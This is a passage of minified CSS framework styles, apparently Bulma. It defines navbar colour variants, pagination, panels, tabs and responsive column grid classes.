.navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover{background-color:#3abb67;color:#fff}.navbar.is-success .navbar-end .navbar-link::after,.navbar.is-success .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-success .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link{background-color:#3abb67;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c774;color:#fff}}.navbar.is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link,.navbar.is-warning .navbar-brand>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover{background-color:#ffd83d;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-burger{color:rgba(0,0,0,.7)}@media screen and (min-width:1024px){.navbar.is-warning .navbar-end .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-start>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-end .navbar-link.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover{background-color:#ffd83d;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-end .navbar-link::after,.navbar.is-warning .navbar-start .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link{background-color:#ffd83d;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffdd57;color:rgba(0,0,0,.7)}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand .navbar-link,.navbar.is-danger .navbar-brand>.navbar-item{color:#fff}.navbar.is-danger .navbar-brand .navbar-link.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-danger .navbar-end .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-start>.navbar-item{color:#fff}.navbar.is-danger .navbar-end .navbar-link.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-end .navbar-link::after,.navbar.is-danger .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px 0 0 #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px 0 0 #f5f5f5}.navbar.is-fixed-top{top:0}body.has-navbar-fixed-top,html.has-navbar-fixed-top{padding-top:3.25rem}body.has-navbar-fixed-bottom,html.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:rgba(0,0,0,.05)}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}.navbar-link,a.navbar-item{cursor:pointer}.navbar-link.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,a.navbar-item.is-active,a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover{background-color:#fafafa;color:#3273dc}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#3273dc}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#3273dc;border-bottom-style:solid;border-bottom-width:3px;color:#3273dc;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless)::after{border-color:#3273dc;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width:1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link::after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px rgba(10,10,10,.1);padding:.5rem 0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px rgba(10,10,10,.1)}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}body.has-navbar-fixed-top-touch,html.has-navbar-fixed-top-touch{padding-top:3.25rem}body.has-navbar-fixed-bottom-touch,html.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width:1024px){.navbar,.navbar-end,.navbar-menu,.navbar-start{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 2rem}.navbar.is-spaced .navbar-end,.navbar.is-spaced .navbar-start{align-items:center}.navbar.is-spaced .navbar-link,.navbar.is-spaced a.navbar-item{border-radius:4px}.navbar.is-transparent .navbar-link.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#3273dc}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link::after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px rgba(10,10,10,.1);top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px rgba(10,10,10,.1);display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#3273dc}.navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-dropdown{border-radius:6px;border-top:none;box-shadow:0 8px 8px rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.1);display:block;opacity:0;pointer-events:none;top:calc(100% + (-4px));transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.container>.navbar .navbar-brand,.navbar>.container .navbar-brand{margin-left:-.75rem}.container>.navbar .navbar-menu,.navbar>.container .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px rgba(10,10,10,.1)}.navbar.is-fixed-top-desktop{top:0}body.has-navbar-fixed-top-desktop,html.has-navbar-fixed-top-desktop{padding-top:3.25rem}body.has-navbar-fixed-bottom-desktop,html.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}body.has-spaced-navbar-fixed-top,html.has-spaced-navbar-fixed-top{padding-top:5.25rem}body.has-spaced-navbar-fixed-bottom,html.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}.navbar-link.is-active,a.navbar-item.is-active{color:#0a0a0a}.navbar-link.is-active:not(:focus):not(:hover),a.navbar-item.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown.is-active .navbar-link,.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-next,.pagination.is-rounded .pagination-previous{padding-left:1em;padding-right:1em;border-radius:290486px}.pagination.is-rounded .pagination-link{border-radius:290486px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-link,.pagination-next,.pagination-previous{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-link:hover,.pagination-next:hover,.pagination-previous:hover{border-color:#b5b5b5;color:#363636}.pagination-link:focus,.pagination-next:focus,.pagination-previous:focus{border-color:#3273dc}.pagination-link:active,.pagination-next:active,.pagination-previous:active{box-shadow:inset 0 1px 2px rgba(10,10,10,.2)}.pagination-link[disabled],.pagination-next[disabled],.pagination-previous[disabled]{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-next,.pagination-previous{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#3273dc;border-color:#3273dc;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}@media screen and (max-width:768px){.pagination{flex-wrap:wrap}.pagination-next,.pagination-previous{flex-grow:1;flex-shrink:1}.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width:769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#3273dc;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#3273dc}.panel.is-link .panel-block.is-active .panel-icon{color:#3273dc}.panel.is-info .panel-heading{background-color:#3298dc;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3298dc}.panel.is-info .panel-block.is-active .panel-icon{color:#3298dc}.panel.is-success .panel-heading{background-color:#48c774;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c774}.panel.is-success .panel-block.is-active .panel-icon{color:#48c774}.panel.is-warning .panel-heading{background-color:#ffdd57;color:rgba(0,0,0,.7)}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffdd57}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffdd57}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger .panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-block:not(:last-child),.panel-tabs:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#3273dc}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#3273dc;color:#363636}.panel-block.is-active .panel-icon{color:#3273dc}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#3273dc;color:#3273dc}.tabs ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-radius:4px 0 0 4px}.tabs.is-toggle li:last-child a{border-radius:0 4px 4px 0}.tabs.is-toggle li.is-active a{background-color:#3273dc;border-color:#3273dc;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:290486px;border-top-left-radius:290486px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child a{border-bottom-right-radius:290486px;border-top-right-radius:290486px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-offset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:none;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and (max-width:768px){.column.is-narrow-mobile{flex:none}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{margin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width:769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-tablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and 